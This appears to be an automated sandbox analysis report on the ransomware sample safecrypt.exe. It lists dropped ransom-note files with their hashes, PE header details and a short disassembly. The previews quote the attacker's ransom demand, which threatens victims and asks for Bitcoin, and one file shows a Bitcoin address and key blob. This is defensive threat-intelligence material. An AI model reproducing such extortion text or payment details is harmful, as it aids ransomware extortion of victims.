                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\dbg\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\dbg\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  C:\ProgramData\dbg\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  C:\ProgramData\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  C:\ProgramData\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  C:\ProgramData\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  C:\ProgramData\regid.1991-06.com.microsoft\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\regid.1991-06.com.microsoft\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\regid.1991-06.com.microsoft\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\Users\Public\Documents\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  C:\Users\Public\Documents\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  C:\Users\Public\Documents\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  C:\Users\Public\Music\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  C:\Users\Public\Music\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  C:\Users\Public\Music\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  C:\Users\Public\Pictures\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  C:\Users\Public\Pictures\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\Users\Public\Pictures\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  C:\Users\Public\Videos\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\Users\Public\Videos\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  C:\Users\Public\Videos\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Process:C:\Users\user\Desktop\safecrypt.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):495616
                  Entropy (8bit):7.100833923038912
                  Encrypted:false
                  SSDEEP:12288:UH2tiySKXkTDj0jxwn8mHiCA092tiySKXkTDj0jxwnvSxU/:7AKXeDj0jkDA0QAKXeDj0jD
                  MD5:4A1D88603B1007825A9C6B36D1E5DE44
                  SHA1:78A6E76AB32039576B52153B56F2E8BD035222C3
                  SHA-256:7004AF389D633B82C3EE67055ECB0F9ACCAE5DC0A53721DA66C76825ECE528F8
                  SHA-512:1585048BB9B465CB372B8369F5AA1472ED1252E642DB332DCBBC0F2C1582DA47459CC14A461EEE4BFE178DEEB3CF5D07E719CAE21E78B8DAC7FB28347A50F9D8
                  Malicious:true
                  Antivirus:
                  • Antivirus: Metadefender, Detection: 74%, Browse
                  • Antivirus: ReversingLabs, Detection: 96%
                  C:\Users\user\Documents\recover_file_uccnnnwww.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):254
                  Entropy (8bit):4.542327134219705
                  Encrypted:false
                  SSDEEP:6:7tYdQOA0VD50v1V9iYgvz3hepaLmzRLmB8Hn7WQj3FKcQ0is:OdyiDYgjhSaLe28HdHCs
                  MD5:ED9A2602D6F32E1461626A6008C48DC6
                  SHA1:28DD184EFAEE68C02A74A257A20C08010CCB534E
                  SHA-256:A43EC3F1655D0CA9A57CA4497CB9421E7658E85AA6422641B41EDC859874CC7A
                  SHA-512:DE8B4DDAE3D63F8F3208C1A4C93786528FED1F43ADE81E20593A6F36FF237F2FE164CC160961D1A751096C56AD4612AF4F3FC0A8F880E819E3B1274429823E8D
                  Malicious:false
                  Preview: 17jHt1XfGUCndM4rug2Xfxx7SZ4naS1xNV..04C5D06B5583E0FDA056ED8ECF86AEC81F048A0D98B0D886F35E524A7467567AC8337F3B7EF2F81C1F1EED679487F8BD6FB4F78D8C8E426D8A409EF35C7335F06915B4AB60F0E04EE44B3C09B49133EC8D7AE35FF8D60B151E595C850693C13F02..BC32439525276233..20..

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.100833923038912
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:safecrypt.exe
                  File size:495616
                  MD5:4a1d88603b1007825a9c6b36d1e5de44
                  SHA1:78a6e76ab32039576b52153b56f2e8bd035222c3
                  SHA256:7004af389d633b82c3ee67055ecb0f9accae5dc0a53721da66c76825ece528f8
                  SHA512:1585048bb9b465cb372b8369f5aa1472ed1252e642db332dcbbc0f2c1582da47459cc14a461eee4bfe178deeb3cf5d07e719cae21e78b8dac7fb28347a50f9d8
                  SSDEEP:12288:UH2tiySKXkTDj0jxwn8mHiCA092tiySKXkTDj0jxwnvSxU/:7AKXeDj0jkDA0QAKXeDj0jD

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x441a46
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x448970C3 [Fri Jun 9 12:59:47 2006 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:8a09dfd04bde6e880e98701ff3654ab6

                  Entrypoint Preview

                  Instruction
                  push ebp
                  mov ebp, esp
                  push FFFFFFFFh
                  push 00470E58h
                  push 00441BCCh
                  mov eax, dword ptr fs:[00000000h]
                  push eax
                  mov dword ptr fs:[00000000h], esp
                  sub esp, 68h
                  push ebx
                  push esi
                  push edi
                  mov dword ptr [ebp-18h], esp
                  xor ebx, ebx
                  mov dword ptr [ebp-04h], ebx
                  push 00000002h
                  call dword ptr [0044241Ch]
                  pop ecx
                  or dword ptr [0086EFBCh], FFFFFFFFh
                  or dword ptr [0086EFC0h], FFFFFFFFh
                  call dword ptr [00442420h]
                  mov ecx, dword ptr [0086EFA8h]
                  mov dword ptr [eax], ecx
                  call dword ptr [00442424h]
                  mov ecx, dword ptr [0086EFA4h]
                  mov dword ptr [eax], ecx
                  mov eax, dword ptr [00442428h]
                  mov eax, dword ptr [eax]
                  mov dword ptr [0086EFB8h], eax
                  call 00007F3A5CA6916Bh
                  cmp dword ptr [00475EB0h], ebx
                  jne 00007F3A5CA6905Eh
                  push 00441BC8h
                  call dword ptr [0044242Ch]
                  pop ecx
                  call 00007F3A5CA6913Dh
                  push 00474014h
                  push 00474010h
                  call 00007F3A5CA69128h
                  mov eax, dword ptr [0086EFA0h]
                  mov dword ptr [ebp-6Ch], eax
                  lea eax, dword ptr [ebp-6Ch]
                  push eax
                  push dword ptr [0086EF9Ch]
                  lea eax, dword ptr [ebp-64h]
                  push eax
                  lea eax, dword ptr [ebp-70h]
                  push eax
                  lea eax, dword ptr [ebp-60h]
                  push eax
                  call dword ptr [00442434h]
                  push 0047400Ch
                  push 00474000h
                  call 00007F3A5CA690F5h

                  Rich Headers

                  Programming Language:
                  • [ C ] VS98 (6.0) build 8168
                  • [EXP] VC++ 6.0 SP5 build 8804
                  • [C++] VS98 (6.0) build 8168
                  • [LNK] VS98 (6.0) imp/exp build 8168

                  Data Directories

                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x70ee0 | 0xa0 | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x46f000 | 0x2438 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x42000 | 0x980 | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                  Sections

                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x40ed4 | 0x41000 | False | 0.830187049279 | data | 7.12605118752 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata | 0x42000 | 0x31d00 | 0x32000 | False | 0.85203125 | data | 7.05842859557 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0x74000 | 0x3fafc4 | 0x2000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc | 0x46f000 | 0x2438 | 0x3000 | False | 0.43212890625 | data | 4.23190923618 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  Name | RVA | Size | Type | Language | Country
                  RT_ICON | 0x46f420 | 0x73 | dBase IV DBT of @.DBF, block length 512, next free block index 40 | |
                  RT_ICON | 0x46f708 | 0x1e7 | GLS_BINARY_LSB_FIRST | |
                  RT_ICON | 0x46f858 | 0x18a | GLS_BINARY_LSB_FIRST | |
